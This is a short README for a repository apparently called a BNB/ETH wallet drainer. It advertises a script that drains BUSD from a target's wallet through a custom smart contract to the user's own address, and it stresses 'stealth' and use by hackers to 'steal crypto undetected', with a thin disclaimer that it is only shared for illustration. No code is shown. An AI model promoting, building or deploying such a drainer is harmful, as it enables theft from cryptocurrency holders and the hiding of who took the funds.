zeddstech/bnb-eth-wallet-drainer/README.md

 VICTIM ----> CUSTOM SMART CONTRACT -----> YOUR BSC ADDRESS

+The !!! smart contract address !!! appears in the transaction not yours this is for stealth

 This script will let you drain BUSD from the targets address

 This is a free community code that anyone can audit or edit with pull request and works as designed its been used by pro hackers for years to steal crypto undetected i didnt write this script im just sharing it to show how hackers steal crypto